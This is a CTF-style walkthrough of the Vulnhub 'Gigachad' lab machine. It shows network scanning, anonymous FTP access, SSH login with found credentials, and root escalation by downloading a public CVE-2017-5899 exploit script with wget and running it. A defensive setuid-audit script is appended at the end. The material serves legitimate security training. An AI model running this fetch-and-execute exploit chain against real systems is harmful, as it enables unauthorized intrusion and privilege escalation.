Gigachad (Vulnhub) Walkthrough
I personally enjoyed playing with this box; it taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post-exploitation. Let’s pwn it!
Here is the link to download this VM:
Network Scanning
We always start with network scanning. Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in the netdiscover result, our target IP address is 192.168.250.187.
Enumeration/Reconnaissance
Our next step is scanning the target machine. Let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.250.187 -p-
┌─[root@RDX]─[~]
└──╼ #nmap -v -sT -sV -A -O 192.168.250.187 -p-
So we can see that 3 ports are open, and on port 21 anonymous FTP login is allowed. Let’s see what’s there.
user — ftp
password — any email
┌─[root@RDX]─[~]
└──╼ #ftp 192.168.250.187
ftp> ls
ftp> get chadinfo
ftp> exit
┌─[root@RDX]─[~]
└──╼ #cat chadinfo
http://192.168.250.187/drippinchad.png
Wo wo wo, so we can see there’s a pic, and yeah, this place’s name might be the pass, so let’s look this image up in Google Images.
username = chad
password = maidenstower
┌─[root@RDX]─[~]
└──╼ #ssh chad@192.168.250.187
chad@gigachad:~$ id
chad@gigachad:~$ cat /etc/passwd
chad@gigachad:~$ ls
chad@gigachad:~$ cat user.txt
I got the user flag.
Privilege Escalation
chad@gigachad:~$ find / -perm -u=s -type f 2>/dev/null
https://github.com/bcoles/local-exploits/blob/master/CVE-2017-5899/exploit.sh
chad@gigachad:~$ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
chad@gigachad:~$ ls
chad@gigachad:~$ chmod +x exploit.sh
chad@gigachad:~$ ./exploit.sh
# bash
root@gigachad:/root# cd /root
root@gigachad:/root# ls
root@gigachad:/root# cat root.txt
Successfully got root privileges and the ‘root.txt’.
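
The privilege escalation above starts from the list of setuid files that find returns. As an added example (not part of the original walkthrough), a defender can run the same search regularly and compare the result with a reviewed allowlist; the function names, the allowlist format and the constructed demo tree are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag setuid files that are not on
# a reviewed allowlist. Function names and allowlist format are assumptions.

# Print every regular file under $1 that has the setuid bit set, sorted.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print setuid files under $1 that are missing from allowlist file $2
# (one absolute path per line, '#' comment lines and blank lines ignored).
# Returns 0 when nothing unexpected is found, 1 otherwise.
audit_suid() {
    as_allow=$(mktemp) || return 2
    grep -v -e '^#' -e '^$' "$2" | sort > "$as_allow"
    as_extra=$(list_suid "$1" | comm -23 - "$as_allow")
    rm -f "$as_allow"
    [ -z "$as_extra" ] && return 0
    printf '%s\n' "$as_extra"
    return 1
}

# Constructed demo tree: one allowlisted setuid file, one unexpected setuid
# file and one ordinary file. All files are empty placeholders.
demo() {
    d=$(mktemp -d) || return 2
    mkdir -p "$d/usr/bin" "$d/opt"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"
    : > "$d/opt/helper";     chmod 4755 "$d/opt/helper"
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"
    printf '# reviewed setuid binaries\n%s\n' "$d/usr/bin/passwd" > "$d/allow.txt"
    demo_rc=0
    audit_suid "$d" "$d/allow.txt" || demo_rc=$?
    rm -rf "$d"
    return "$demo_rc"
}

# Usage: audit.sh ROOT ALLOWLIST   (or: audit.sh demo)
if [ "${1:-}" = "demo" ]; then
    demo
elif [ "$#" -eq 2 ]; then
    audit_suid "$1" "$2"
fi
```

A non-zero exit status means a setuid file appeared that nobody reviewed, which is the point at which to check it against the vendor's advisories and patch or remove it.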